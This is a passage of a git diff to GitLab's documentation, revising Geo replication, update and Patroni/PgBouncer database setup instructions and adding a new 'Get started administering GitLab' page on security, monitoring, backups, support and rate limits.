geo:set_secondary_as_primary +``` ## Expired artifacts @@ -794,7 +864,7 @@ PostgreSQL instances: The most common problems that prevent the database from replicating correctly are: -- **Secondary** nodes cannot reach the **primary** node. Check credentials, firewall rules, etc. +- **Secondary** nodes cannot reach the **primary** node. Check credentials, firewall rules, and so on. - SSL certificate problems. Make sure you copied `/etc/gitlab/gitlab-secrets.json` from the **primary** node. - Database storage disk is full. - Database replication slot is misconfigured. diff --git a/doc/administration/geo/replication/updating_the_geo_nodes.md b/doc/administration/geo/replication/updating_the_geo_nodes.md index 0c68adf162d..03570048071 100644 --- a/doc/administration/geo/replication/updating_the_geo_nodes.md +++ b/doc/administration/geo/replication/updating_the_geo_nodes.md @@ -28,9 +28,9 @@ and all **secondary** nodes: 1. **Optional:** [Pause replication on each **secondary** node.](../index.md#pausing-and-resuming-replication) 1. Log into the **primary** node. -1. [Update GitLab on the **primary** node using Omnibus's Geo-specific steps](https://docs.gitlab.com/omnibus/update/README.html#geo-deployment). +1. [Update GitLab on the **primary** node using Omnibus](https://docs.gitlab.com/omnibus/update/#update-using-the-official-repositories). 1. Log into each **secondary** node. -1. [Update GitLab on each **secondary** node using Omnibus's Geo-specific steps](https://docs.gitlab.com/omnibus/update/README.html#geo-deployment). +1. [Update GitLab on each **secondary** node using Omnibus](https://docs.gitlab.com/omnibus/update/#update-using-the-official-repositories). 1. If you paused replication in step 1, [resume replication on each **secondary**](../index.md#pausing-and-resuming-replication) 1. [Test](#check-status-after-updating) **primary** and **secondary** nodes, and check version in each. diff --git a/doc/administration/geo/replication/usage.md b/doc/administration/geo/replication/usage.md index 1491aa3427e..7fe8eec467e 100644 --- a/doc/administration/geo/replication/usage.md +++ b/doc/administration/geo/replication/usage.md @@ -27,7 +27,7 @@ Everything up-to-date ``` NOTE: -If you're using HTTPS instead of [SSH](../../../ssh/README.md) to push to the secondary, +If you're using HTTPS instead of [SSH](../../../ssh/index.md) to push to the secondary, you can't store credentials in the URL like `user:password@URL`. Instead, you can use a [`.netrc` file](https://www.gnu.org/software/inetutils/manual/html_node/The-_002enetrc-file.html) for Unix-like operating systems or `_netrc` for Windows. In that case, the credentials diff --git a/doc/administration/geo/replication/version_specific_updates.md b/doc/administration/geo/replication/version_specific_updates.md index 301be931b29..e193fc630b9 100644 --- a/doc/administration/geo/replication/version_specific_updates.md +++ b/doc/administration/geo/replication/version_specific_updates.md @@ -11,16 +11,35 @@ Review this page for update instructions for your version. These steps accompany the [general steps](updating_the_geo_nodes.md#general-update-steps) for updating Geo nodes. +## Updating to GitLab 13.12 + +We found an issue where [secondary nodes re-download all LFS files](https://gitlab.com/gitlab-org/gitlab/-/issues/334550) upon update. This bug: + +- Only applies to Geo secondary sites that have replicated LFS objects. +- Is _not_ a data loss risk. +- Causes churn and wasted bandwidth re-downloading all LFS objects. +- May impact performance for GitLab installations with a large number of LFS files. + +If you don't have many LFS objects or can stand a bit of churn, then it is safe to let the secondary sites re-download LFS objects. +If you do have many LFS objects, or many Geo secondary sites, or limited bandwidth, or a combination of them all, then we recommend you skip GitLab 13.12.0 through 13.12.6 and update to GitLab 13.12.7 or newer. + +### If you have already updated to an affected version, and the re-sync is ongoing + +You can manually migrate the legacy sync state to the new state column by running the following command in a [Rails console](../../operations/rails_console.md). It should take under a minute: + +```ruby +Geo::LfsObjectRegistry.where(state: 0, success: true).update_all(state: 2) +``` + ## Updating to GitLab 13.11 -We found an [issue with Git clone/pull through HTTP(s)](https://gitlab.com/gitlab-org/gitlab/-/issues/330787) on Geo secondaries and on any GitLab instance if maintenance mode is enabled. This was caused by a regression in GitLab Workhorse. This is fixed in the [GitLab 13.11.4 patch release](https://about.gitlab.com/releases/2021/05/14/gitlab-13-11-4-released/). To avoid this issue, upgrade to GitLab 13.11.4 or later. +We found an [issue with Git clone/pull through HTTP(s)](https://gitlab.com/gitlab-org/gitlab/-/issues/330787) on Geo secondaries and on any GitLab instance if maintenance mode is enabled. This was caused by a regression in GitLab Workhorse. This is fixed in the [GitLab 13.11.4 patch release](https://about.gitlab.com/releases/2021/05/14/gitlab-13-11-4-released/). To avoid this issue, upgrade to GitLab 13.11.4 or later. ## Updating to GitLab 13.9 We've detected an issue [with a column rename](https://gitlab.com/gitlab-org/gitlab/-/issues/324160) -that may prevent upgrades to GitLab 13.9.0, 13.9.1, 13.9.2 and 13.9.3. -We are working on a patch, but until a fixed version is released, you can manually complete -the zero-downtime upgrade: +that will prevent upgrades to GitLab 13.9.0, 13.9.1, 13.9.2 and 13.9.3 when following the zero-downtime steps. It is necessary +to perform the following additional steps for the zero-downtime upgrade: 1. Before running the final `sudo gitlab-rake db:migrate` command on the deploy node, execute the following queries using the PostgreSQL console (or `sudo gitlab-psql`) @@ -40,9 +59,18 @@ the zero-downtime upgrade: ``` If you have already run the final `sudo gitlab-rake db:migrate` command on the deploy node and have -encountered the [column rename issue](https://gitlab.com/gitlab-org/gitlab/-/issues/324160), you can still -follow the previous steps to complete the update. +encountered the [column rename issue](https://gitlab.com/gitlab-org/gitlab/-/issues/324160), you will +see the following error: + +```shell +-- remove_column(:application_settings, :asset_proxy_whitelist) +rake aborted! +StandardError: An error has occurred, all later migrations canceled: +PG::DependentObjectsStillExist: ERROR: cannot drop column asset_proxy_whitelist of table application_settings because other objects depend on it +DETAIL: trigger trigger_0d588df444c8 on table application_settings depends on column asset_proxy_whitelist of table application_settings +``` +To work around this bug, follow the previous steps to complete the update. More details are available [in this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/324160). ## Updating to GitLab 13.7 diff --git a/doc/administration/geo/setup/database.md b/doc/administration/geo/setup/database.md index f6e72092a5f..bc4128deb4a 100644 --- a/doc/administration/geo/setup/database.md +++ b/doc/administration/geo/setup/database.md @@ -31,17 +31,17 @@ A single instance database replication is easier to set up and still provides th as a clusterized alternative. It's useful for setups running on a single machine or trying to evaluate Geo for a future clusterized installation. -A single instance can be expanded to a clusterized version using Patroni, which is recommended for a +A single instance can be expanded to a clusterized version using Patroni, which is recommended for a highly available architecture. -Follow below the instructions on how to set up PostgreSQL replication as a single instance database. -Alternatively, you can look at the [Multi-node database replication](#multi-node-database-replication) +Follow below the instructions on how to set up PostgreSQL replication as a single instance database. +Alternatively, you can look at the [Multi-node database replication](#multi-node-database-replication) instructions on setting up replication with a Patroni cluster. ### PostgreSQL replication The GitLab **primary** node where the write operations happen connects to -the **primary** database server, and **secondary** nodes +the **primary** database server, and **secondary** nodes connect to their own database servers (which are also read-only). We recommend using [PostgreSQL replication slots](https://medium.com/@tk512/replication-slots-in-postgresql-b4b03d277c75) @@ -112,13 +112,13 @@ There is an [issue where support is being discussed](https://gitlab.com/gitlab-o # must be present in all application nodes. gitlab_rails['db_password'] = '<your_password_here>' ``` - + 1. Define a password for the database [replication user](https://wiki.postgresql.org/wiki/Streaming_Replication). We will use the username defined in `/etc/gitlab/gitlab.rb` under the `postgresql['sql_replication_user']` - setting. The default value is `gitlab_replicator`, but if you changed it to something else, adapt + setting. The default value is `gitlab_replicator`, but if you changed it to something else, adapt the instructions below. - + Generate a MD5 hash of the desired password: ```shell @@ -462,10 +462,10 @@ data before running `pg_basebackup`. - If PostgreSQL is listening on a non-standard port, add `--port=` as well. - If your database is too large to be transferred in 30 minutes, you need - to increase the timeout, e.g., `--backup-timeout=3600` if you expect the + to increase the timeout, for example, `--backup-timeout=3600` if you expect the initial replication to take under an hour. - Pass `--sslmode=disable` to skip PostgreSQL TLS authentication altogether - (e.g., you know the network path is secure, or you are using a site-to-site + (for example, you know the network path is secure, or you are using a site-to-site VPN). This is **not** safe over the public Internet! - You can read more details about each `sslmode` in the [PostgreSQL documentation](https://www.postgresql.org/docs/12/libpq-ssl.html#LIBPQ-SSL-PROTECTION); @@ -484,12 +484,12 @@ The replication process is now complete. ### PgBouncer support (optional) [PgBouncer](https://www.pgbouncer.org/) may be used with GitLab Geo to pool -PostgreSQL connections, which can improve performance even when using in a -single instance installation. +PostgreSQL connections, which can improve performance even when using in a +single instance installation. -We recommend using PgBouncer if you use GitLab in a highly available -configuration with a cluster of nodes supporting a Geo **primary** site and -two other clusters of nodes supporting a Geo **secondary** site. One for the +We recommend using PgBouncer if you use GitLab in a highly available +configuration with a cluster of nodes supporting a Geo **primary** site and +two other clusters of nodes supporting a Geo **secondary** site. One for the main database and the other for the tracking database. For more information, see [High Availability with Omnibus GitLab](../../postgresql/replication_and_failover.md). @@ -505,7 +505,7 @@ If you still haven't [migrated from repmgr to Patroni](#migrating-from-repmgr-to Patroni is the official replication management solution for Geo. It can be used to build a highly available cluster on the **primary** and a **secondary** Geo site. -Using Patroni on a **secondary** site is optional and you don't have to use the same amount of +Using Patroni on a **secondary** site is optional and you don't have to use the same amount of nodes on each Geo site. For instructions about how to set up Patroni on the primary site, see the @@ -515,13 +515,21 @@ For instructions about how to set up Patroni on the primary site, see the In a Geo secondary site, the main PostgreSQL database is a read-only replica of the primary site’s PostgreSQL database. -If you are currently using `repmgr` on your Geo primary site, see [these instructions](#migrating-from-repmgr-to-patroni) for migrating from `repmgr` to Patroni. +If you are currently using `repmgr` on your Geo primary site, see [these instructions](#migrating-from-repmgr-to-patroni) +for migrating from `repmgr` to Patroni. + +A production-ready and secure setup requires at least: + +- 3 Consul nodes _(primary and secondary sites)_ +- 2 Patroni nodes _(primary and secondary sites)_ +- 1 PgBouncer node _(primary and secondary sites)_ +- 1 internal load-balancer _(primary site only)_ + +The internal load balancer provides a single endpoint for connecting to the Patroni cluster's leader whenever a new leader is +elected, and it is required for enabling cascading replication from the secondary sites. -A production-ready and secure setup requires at least three Consul nodes, three -Patroni nodes, one internal load-balancing node on the primary site, and a similar -configuration for the secondary site. The internal load balancer provides a single -endpoint for connecting to the Patroni cluster's leader whenever a new leader is -elected. Be sure to use [password credentials](../../postgresql/replication_and_failover.md#database-authorization-for-patroni) and other database best practices. +Be sure to use [password credentials](../../postgresql/replication_and_failover.md#database-authorization-for-patroni) +and other database best practices. ##### Step 1. Configure Patroni permanent replication slot on the primary site @@ -542,12 +550,12 @@ Leader instance**: ```ruby roles(['patroni_role']) - + consul['services'] = %w(postgresql) consul['configuration'] = { retry_join: %w[CONSUL_PRIMARY1_IP CONSUL_PRIMARY2_IP CONSUL_PRIMARY3_IP] } - + # You need one entry for each secondary, with a unique name following PostgreSQL slot_name constraints: # # Configuration syntax is: 'unique_slotname' => { 'type' => 'physical' }, @@ -559,6 +567,8 @@ Leader instance**: patroni['use_pg_rewind'] = true patroni['postgresql']['max_wal_senders'] = 8 # Use double of the amount of patroni/reserved slots (3 patronis + 1 reserved slot for a Geo secondary). patroni['postgresql']['max_replication_slots'] = 8 # Use double of the amount of patroni/reserved slots (3 patronis + 1 reserved slot for a Geo secondary). + patroni['username'] = 'PATRONI_API_USERNAME' + patroni['password'] = 'PATRONI_API_PASSWORD' patroni['replication_password'] = 'PLAIN_TEXT_POSTGRESQL_REPLICATION_PASSWORD' # We list all secondary instances as they can all become a Standby Leader @@ -719,27 +729,41 @@ For each Patroni instance on the secondary site: patroni['standby_cluster']['host'] = 'INTERNAL_LOAD_BALANCER_PRIMARY_IP' patroni['standby_cluster']['port'] = INTERNAL_LOAD_BALANCER_PRIMARY_PORT patroni['standby_cluster']['primary_slot_name'] = 'geo_secondary' # Or the unique replication slot name you setup before + patroni['username'] = 'PATRONI_API_USERNAME' + patroni['password'] = 'PATRONI_API_PASSWORD' patroni['replication_password'] = 'PLAIN_TEXT_POSTGRESQL_REPLICATION_PASSWORD' patroni['use_pg_rewind'] = true patroni['postgresql']['max_wal_senders'] = 5 # A minimum of three for one replica, plus two for each additional replica patroni['postgresql']['max_replication_slots'] = 5 # A minimum of three for one replica, plus two for each additional replica - + postgresql['pgbouncer_user_password'] = 'PGBOUNCER_PASSWORD_HASH' postgresql['sql_replication_password'] = 'POSTGRESQL_REPLICATION_PASSWORD_HASH' postgresql['sql_user_password'] = 'POSTGRESQL_PASSWORD_HASH' postgresql['listen_address'] = '0.0.0.0' # You can use a public or VPC address here instead - + gitlab_rails['dbpassword'] = 'POSTGRESQL_PASSWORD' gitlab_rails['enable'] = true gitlab_rails['auto_migrate'] = false ``` 1. Reconfigure GitLab for the changes to take effect. - This is required to bootstrap PostgreSQL users and settings: + This is required to bootstrap PostgreSQL users and settings. - ```shell - gitlab-ctl reconfigure - ``` + - If this is a fresh installation of Patroni: + + ```shell + gitlab-ctl reconfigure + ``` + + - If you are configuring a Patroni standby cluster on a site that previously had a working Patroni cluster: + + ```shell + gitlab-ctl stop patroni + rm -rf /var/opt/gitlab/postgresql/data + /opt/gitlab/embedded/bin/patronictl -c /var/opt/gitlab/patroni/patroni.yaml remove postgresql-ha + gitlab-ctl reconfigure + gitlab-ctl start patroni + ``` ### Migrating from repmgr to Patroni @@ -769,17 +793,17 @@ by following the same instructions above. Secondary sites use a separate PostgreSQL installation as a tracking database to keep track of replication status and automatically recover from potential replication issues. Omnibus automatically configures a tracking database when `roles(['geo_secondary_role'])` is set. -If you want to run this database in a highly available configuration, follow the instructions below. -A production-ready and secure setup requires at least three Consul nodes, three -Patroni nodes on the secondary site secondary site. Be sure to use [password credentials](../../postgresql/replication_and_failover.md#database-authorization-for-patroni) and other database best practices. +If you want to run this database in a highly available configuration, don't use the `geo_secondary_role` above. +Instead, follow the instructions below. -#### Step 1. Configure a PgBouncer node on the secondary site +A production-ready and secure setup requires at least three Consul nodes, two +Patroni nodes and one PgBouncer node on the secondary site. -A production-ready and highly available configuration requires at least -three Consul nodes, three PgBouncer nodes, and one internal load-balancing node. -The internal load balancer provides a single endpoint for connecting to the -PgBouncer cluster. For more information, see [High Availability with Omnibus GitLab](../../postgresql/replication_and_failover.md). +Be sure to use [password credentials](../../postgresql/replication_and_failover.md#database-authorization-for-patroni) +and other database best practices. + +#### Step 1. Configure a PgBouncer node on the secondary site Follow the minimal configuration for the PgBouncer node for the tracking database: @@ -880,6 +904,8 @@ For each Patroni instance on the secondary site for the tracking database: ] # Patroni configuration + patroni['username'] = 'PATRONI_API_USERNAME' + patroni['password'] = 'PATRONI_API_PASSWORD' patroni['replication_password'] = 'PLAIN_TEXT_POSTGRESQL_REPLICATION_PASSWORD' patroni['postgresql']['max_wal_senders'] = 5 # A minimum of three for one replica, plus two for each additional replica diff --git a/doc/administration/geo/setup/external_database.md b/doc/administration/geo/setup/external_database.md index 9e187424afa..3ec84f1268b 100644 --- a/doc/administration/geo/setup/external_database.md +++ b/doc/administration/geo/setup/external_database.md @@ -57,7 +57,7 @@ developed and tested. We aim to be compatible with most external To set up an external database, you can either: -- Set up [streaming replication](https://www.postgresql.org/docs/12/warm-standby.html#STREAMING-REPLICATION-SLOTS) yourself (for example AWS RDS, bare metal not managed by Omnibus, etc.). +- Set up [streaming replication](https://www.postgresql.org/docs/12/warm-standby.html#STREAMING-REPLICATION-SLOTS) yourself (for example AWS RDS, bare metal not managed by Omnibus, and so on). - Perform the Omnibus configuration manually as follows. #### Leverage your cloud provider's tools to replicate the primary database @@ -208,8 +208,8 @@ the tracking database on port 5432. 1. Set up PostgreSQL according to the [database requirements document](../../../install/requirements.md#database). 1. Set up a `gitlab_geo` user with a password of your choice, create the `gitlabhq_geo_production` database, and make the user an owner of the database. You can see an example of this setup in the [installation from source documentation](../../../install/installation.md#6-database). -1. If you are **not** using a cloud-managed PostgreSQL database, ensure that your secondary - node can communicate with your tracking database by manually changing the +1. If you are **not** using a cloud-managed PostgreSQL database, ensure that your secondary + node can communicate with your tracking database by manually changing the `pg_hba.conf` that is associated with your tracking database. Remember to restart PostgreSQL afterwards for the changes to take effect: diff --git a/doc/administration/geo/setup/index.md b/doc/administration/geo/setup/index.md index 1afa4360cbc..84dff69ebe7 100644 --- a/doc/administration/geo/setup/index.md +++ b/doc/administration/geo/setup/index.md @@ -9,24 +9,24 @@ type: howto These instructions assume you have a working instance of GitLab. They guide you through: -1. Making your existing instance the **primary** node. -1. Adding **secondary** nodes. +1. Making your existing instance the **primary** site. +1. Adding **secondary** site(s). WARNING: -The steps below should be followed in the order they appear. **Make sure the GitLab version is the same on all nodes.** +The steps below should be followed in the order they appear. **Make sure the GitLab version is the same on all sites.** ## Using Omnibus GitLab If you installed GitLab using the Omnibus packages (highly recommended): -1. [Install GitLab Enterprise Edition](https://about.gitlab.com/install/) on the server that will serve as the **secondary** node. Do not create an account or log in to the new **secondary** node. -1. [Upload the GitLab License](../../../user/admin_area/license.md) on the **primary** node to unlock Geo. The license must be for [GitLab Premium](https://about.gitlab.com/pricing/) or higher. +1. [Install GitLab Enterprise Edition](https://about.gitlab.com/install/) on the node(s) that will serve as the **secondary** site. Do not create an account or log in to the new **secondary** site. +1. [Upload the GitLab License](../../../user/admin_area/license.md) on the **primary** site to unlock Geo. The license must be for [GitLab Premium](https://about.gitlab.com/pricing/) or higher. 1. [Set up the database replication](database.md) (`primary (read-write) <-> secondary (read-only)` topology). -1. [Configure fast lookup of authorized SSH keys in the database](../../operations/fast_ssh_key_lookup.md). This step is required and needs to be done on **both** the **primary** and **secondary** nodes. -1. [Configure GitLab](../replication/configuration.md) to set the **primary** and **secondary** nodes. -1. Optional: [Configure a secondary LDAP server](../../auth/ldap/index.md) for the **secondary** node. See [notes on LDAP](../index.md#ldap). +1. [Configure fast lookup of authorized SSH keys in the database](../../operations/fast_ssh_key_lookup.md). This step is required and needs to be done on **both** the **primary** and **secondary** site(s). +1. [Configure GitLab](../replication/configuration.md) to set the **primary** and **secondary** site(s). +1. Optional: [Configure a secondary LDAP server](../../auth/ldap/index.md) for the **secondary** site(s). See [notes on LDAP](../index.md#ldap). 1. Follow the [Using a Geo Site](../replication/usage.md) guide. ## Post-installation documentation -After installing GitLab on the **secondary** nodes and performing the initial configuration, see the [following documentation for post-installation information](../index.md#post-installation-documentation). +After installing GitLab on the **secondary** site(s) and performing the initial configuration, see the [following documentation for post-installation information](../index.md#post-installation-documentation). diff --git a/doc/administration/get_started.md b/doc/administration/get_started.md new file mode 100644 index 00000000000..a9ac8b279de --- /dev/null +++ b/doc/administration/get_started.md @@ -0,0 +1,291 @@ +--- +stage: +group: +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Get started administering GitLab **(FREE)** + +Get started with GitLab administration. Configure your organization and its authentication, then secure, monitor, +and back up GitLab. + +## Authentication + +Authentication is the first step in making your installation secure. + +- [Enforce two-factor authentication (2FA) for all users](../security/two_factor_authentication.md). We highly recommended 2FA for self-managed instances. +- Ensure users do the following: + - Choose a strong, secure password. If possible, store it in a password management system. + - If it is not configured for everyone, enable [two-factor authentication (2FA)](../user/profile/account/two_factor_authentication.md) for your account. + This one-time secret code is an additional safeguard that keeps intruders out, even if they have your password. + - Add a backup email. If you lose access to your account, the GitLab Support team can help you more quickly. + - Save or print your recovery codes. If you can't access your authentication device, you can use these recovery codes to sign in to your GitLab account. + - Add [an SSH key](../ssh/index.md) to your profile. You can generate new recovery codes as needed with SSH. + - Enable [personal access tokens](../user/profile/personal_access_tokens.md). When using 2FA, you can use these tokens to access the GitLab API. + +## Projects and groups + +Organize your environment by configuring your groups and projects. + +- [Projects](../user/project/working_with_projects.md): Designate a home for your files and code or track and organize issues in a business category. +- [Groups](../user/group/index.md): Organize a collection of users or projects. Use these groups to quickly assign people and projects. +- [Roles](../user/permissions.md): Define user access and visibility for your projects and groups. + +<i class="fa fa-youtube-play youtube" aria-hidden="true"></i> +Watch an overview of [groups and projects](https://www.youtube.com/watch?v=cqb2m41At6s). + +Get started: + +- Create a [project](../user/project/working_with_projects.md#create-a-project). +- Create a [group](../user/group/index.md#create-a-group). +- [Add members](../user/group/index.md#add-users-to-a-group) to the group. +- Create a [subgroup](../user/group/subgroups/index.md#creating-a-subgroup). +- [Add members](../user/group/subgroups/index.md#membership) to the subgroup. +- Enable [external authorization control](../user/admin_area/settings/external_authorization.md#configuration). + +**More resources** + +- Learn more about [running multiple Agile teams](https://www.youtube.com/watch?v=VR2r1TJCDew). +- Sync group memberships [by using LDAP](../administration/auth/ldap/index.md#group-sync). +- Manage user access with inherited permissions. Use up to 20 levels of subgroups to organize both teams and projects. + - Learn more about [inherited permissions](../user/project/members/index.md#inherited-membership). + - View [nested category examples](../user/group/subgroups/index.md#overview). + +## Import projects + +You may need to import projects from external sources like GitHub, Bitbucket, or another instance of GitLab. Many external sources can be imported into GitLab. + +- Review the [GitLab projects documentation](../user/project/index.md#project-integrations). +- Consider [repository mirroring](../user/project/repository/repository_mirroring.md)—an [alternative to project migrations](../ci/ci_cd_for_external_repos/index.md). +- Check out our [migration index](../user/project/import/index.md) for documentation on common migration paths. +- Schedule your project exports with our [import/export API](../api/project_import_export.md#schedule-an-export). + +### Popular project imports + +- [GitHub Enterprise to self-managed GitLab](../integration/github.md#enabling-github-oauth): Enabling OAuth makes it easier for developers to find and import their projects. +- [Bitbucket Server](../user/project/import/bitbucket_server.md#limitations): There are certain data limitations. + For assistance with these data types, contact your GitLab account manager or GitLab Support about our professional migration services. + +## GitLab instance security + +Security is an important part of the onboarding process. Securing your instance protects your work and your organization. + +While this isn't an exhaustive list, following these steps gives you a solid start for securing your instance. + +- Use a long root password, stored in a vault. +- Install trusted SSL certificate and establish a process for renewal and revocation. +- [Configure SSH key restrictions](../security/ssh_keys_restrictions.md#restrict-allowed-ssh-key-technologies-and-minimum-length) per your organization's guidelines. +- [Disable new sign-ups](../user/admin_area/settings/sign_up_restrictions.md#disable-new-sign-ups). +- Require email confirmation. +- Set password length limit, configure SSO or SAML user management. +- Limit email domains if allowing sign-up. +- Require two-factor authentication (2FA). +- [Disable password authentication](../user/admin_area/settings/sign_in_restrictions.md#password-authentication-enabled) for Git over HTTPS. +- Set up [email notification for unknown sign-ins](../user/admin_area/settings/sign_in_restrictions.md#email-notification-for-unknown-sign-ins). +- Configure [user and IP rate limits](https://about.gitlab.com/blog/2020/05/20/gitlab-instance-security-best-practices/#user-and-ip-rate-limits). +- Limit [webhooks local access](https://about.gitlab.com/blog/2020/05/20/gitlab-instance-security-best-practices/#webhooks). +- Set [rate limits for protected paths](../user/admin_area/settings/protected_paths.md). + +## Monitor GitLab performance + +After you've established your basic setup, you're ready to review the GitLab monitoring services. Prometheus is our core performance monitoring tool. +Unlike other monitoring solutions (for example, Zabbix or New Relic), Prometheus is tightly integrated with GitLab and has extensive community support. + +- [Prometheus](../administration/monitoring/prometheus/index.md) captures + [these GitLab metrics](../administration/monitoring/prometheus/gitlab_metrics.md#metrics-available). +- Learn more about GitLab [bundled software metrics](../administration/monitoring/prometheus/index.md#bundled-software-metrics). +- Prometheus and its exporters are on by default. However, you need to [configure the service](../administration/monitoring/prometheus/index.md#configuring-prometheus). +- Learn more about [GitLab architecture](../development/architecture.md). +- Find out why [application performance metrics](https://about.gitlab.com/blog/2020/05/07/working-with-performance-metrics/) matter. +- Create a [self-monitoring project](../administration/monitoring/gitlab_self_monitoring_project/index.md) to track the health of your instance. +- Integrate Grafana to [build visual dashboards](https://youtu.be/f4R7s0An1qE) based on performance metrics. + +### Components of monitoring + +- [Web servers](../administration/monitoring/prometheus/gitlab_metrics.md#puma-metrics): Handles server requests and facilitates other back-end service transactions. + Monitor CPU, memory, and network IO traffic to track the health of this node. +- [Workhorse](../administration/monitoring/prometheus/gitlab_metrics.md#metrics-available): Alleviates web traffic congestion from the main server. + Monitor latency spikes to track the health of this node. +- [Sidekiq](../administration/monitoring/prometheus/gitlab_metrics.md#sidekiq-metrics): Handles background operations that allow GitLab to run smoothly. + Monitor for long, unprocessed task queues to track the health of this node. + +## Back up your GitLab data + +GitLab provides backup methods to keep your data safe and recoverable. Whether you use a self-managed or a GitLab SaaS database, it's crucial to back up your data regularly. + +- Decide on a backup strategy. +- Consider writing a cron job to make daily backups. +- Separately backup the configuration files. +- Decide what should be left out of the backup. +- Decide where to upload the backups. +- Limit backup lifetime. +- Run a test backup and restore. +- Set up a way to periodically verify the backups. + +### Back up a GitLab self-managed instance + +The routine differs, depending on whether you deployed with Omnibus or the Helm chart. + +When you backing up an Omnibus (single node) GitLab server, you can use a single Rake task. + +Learn about [backing up Omnibus or Helm variations](../raketasks/backup_restore.md#back-up-gitlab). +This process backs up your entire instance, but does not back up the configuration files. Ensure those are backed up separately. +Keep your configuration files and backup archives in a separate location to ensure the encryption keys are not kept with the encrypted data. + +#### Restore a backup + +You can restore a backup only to **the exact same version and type** (Community Edition/Enterprise Edition) of GitLab on which it was created. + +- Review the [Omnibus backup and restore documentation](https://docs.gitlab.com/omnibus/settings/backups). +- Review the [Helm Chart backup and restore documentation](https://docs.gitlab.com/charts/backup-restore). + +### Back up GitLab SaaS + +Backups of GitLab databases and filesystems are taken every 24 hours, and are kept for two weeks on a rolling schedule. All backups are encrypted. + +- GitLab SaaS creates backups to ensure your data is secure, but you can't use these methods to export or back up your data yourself. +- Issues are stored in the database. They can't be stored in Git itself. +- You can use the project export option in: + - [The UI](../user/project/settings/import_export.md#exporting-a-project-and-its-data). + - [The API](../api/project_import_export.md#schedule-an-export). +- [Group export](../user/group/settings/import_export.md) does *not* export the projects in it, but does export: + - Epics + - Milestones + - Boards + - Labels + - Additional items + +For more information about GitLab SaaS backups, see our [Backup FAQ page](https://about.gitlab.com/handbook/engineering/infrastructure/faq/#gitlabcom-backups). + +### Alternative backup strategies + +In some situations the Rake task for backups may not be the most optimal solution. Here are some +[alternatives](../raketasks/backup_restore.md) to consider if the Rake task does not work for you. + +#### Option 1: File system snapshot + +If your GitLab server contains a lot of Git repository data, you may find the GitLab backup script to be too slow. It can be especially slow when backing up to an offsite location. + +Slowness typically starts at a Git repository data size of around 200 GB. In this case, you might consider using file system snapshots as part of your backup strategy. +For example, consider a GitLab server with the following components: + +- Using Omnibus GitLab +- Hosted on AWS with an EBS drive containing an ext4 file system mounted at `/var/opt/gitlab`. + +The EC2 instance meets the requirements for an application data backup by taking an EBS snapshot. The backup includes all repositories, uploads, and PostgreSQL data. + +In general, if you're running GitLab on a virtualized server, you can create VM snapshots of the entire GitLab server. +It is common for a VM snapshot to require you to power down the server. + +#### Option 2: GitLab Geo + +Geo provides local, read-only instances of your GitLab instances. + +While GitLab Geo helps remote teams work more efficiently by using a local GitLab node, it can also be used as a disaster recovery solution. +Learn more about using [Geo as a disaster recovery solution](../administration/geo/disaster_recovery/index.md). + +Geo replicates your database, your Git repositories, and a few other assets. +Learn more about [replication limitations](../administration/geo/replication/datatypes.md#limitations-on-replicationverification). + +## Support for GitLab self-managed + +GitLab provides support for self-managed GitLab through different channels. + +- Priority support: Premium and Ultimate self-managed customers receive priority support with tiered response times. + Learn more about [upgrading to priority support](https://about.gitlab.com/support/#upgrading-to-priority-support). +- Live upgrade assistance: Get one-on-one expert guidance during a production upgrade. With your **priority support plan**, + you're eligible for a live, scheduled screen-sharing session with a member of our support team. + +To get assistance for self-managed GitLab: + +- Use the GitLab documentation for self-service support. +- Join the [GitLab Forum](https://forum.gitlab.com/) for community support. +- Gather [your subscription information](https://about.gitlab.com/support/#for-self-managed-users) before submitting a ticket. +- [Submit a support ticket](https://support.gitlab.com/hc/en-us/requests/new). + +## Support for GitLab SaaS + +If you use GitLab SaaS, you have several channels with which to get support and find answers. + +- Priority support: Gold and Silver GitLab SaaS customers receive priority support with tiered response times. + Learn more about [upgrading to priority support](https://about.gitlab.com/support/#upgrading-to-priority-support). +- GitLab SaaS 24/7 monitoring: Our full team of site reliability and production engineers is always on. + Often, by the time you notice an issue, someone's already looking into it. + +To get assistance for GitLab SaaS: + +- Access [GitLab Docs](../README.md) for self-service support. +- Join the [GitLab Forum](https://forum.gitlab.com/) for community support. +- Gather [your subscription information](https://about.gitlab.com/support/#for-self-managed-users) before submitting a ticket. +- Submit a support ticket for: + - [General assistance](https://support.gitlab.com/hc/en-us/requests/new?ticket_form_id=334447) + - [Account or sign-in issues](https://support.gitlab.com/hc/en-us/requests/new?ticket_form_id=360000803379) +- Subscribe to [the status page](https://status.gitlab.com/) for the latest on GitLab performance or service interruptions. + +## API and rate limits for self-managed GitLab + +Rate limits prevent denial-of-service or brute-force attacks. In most cases, you can reduce the load on your application +and infrastructure by limiting the rate of requests from a single IP address. + +Rate limits also improve the security of your application. + +### Configure rate limits for self-managed GitLab + +You can make changes to your default rate limits from the Admin Area. For more information about configuration, see the [Admin Area page](../security/rate_limits.md#admin-area-settings). + +- Define [issues rate limits](../user/admin_area/settings/rate_limit_on_issues_creation.md) to set a maximum number of issue creation requests per minute, per user. +- Enforce [user and IP rate limits](../user/admin_area/settings/user_and_ip_rate_limits.md) for unauthenticated web requests. +- Review the [rate limit on raw endpoints](../user/admin_area/settings/rate_limits_on_raw_endpoints.md). The default setting is 300 requests per minute for raw file access. +- Review the [import/export rate limits](../user/admin_area/settings/import_export_rate_limits.md) of the six active defaults. + +For more information about API and rate limits, see our [API page](../api/index.md). + +## API and rate limits for GitLab SaaS + +Rate limits prevent denial-of-service or brute-force attacks. IP blocks usually happen when GitLab.com receives unusual traffic +from a single IP address. The system views unusual traffic as potentially malicious based on rate limit settings. + +Rate limits also improve the security of your application. + +### Configure rate limits for GitLab SaaS + +You can make changes to your default rate limits from the Admin Area. For more information about configuration, see the [Admin Area page](../security/rate_limits.md#admin-area-settings). + +- Review the rate limit page. +- Read our [API page](../api/index.md) for more information about API and rate limiting. + +### GitLab SaaS-specific block and error responses + +- [403 forbidden error](../user/gitlab_com/index.md#gitlabcom-specific-rate-limits): If the error occurs for all GitLab SaaS requests, look for an automated process that could have triggered a block. For more assistance, contact GitLab support with your error details, including the affected IP address. +- [HAProxy API throttle](../user/gitlab_com/index.md#haproxy): GitLab SaaS responds with HTTP status code 429 to API requests that exceed 10 requests per second, per IP address. +- [Protected paths throttle](../user/gitlab_com/index.md#protected-paths-throttle): GitLab SaaS 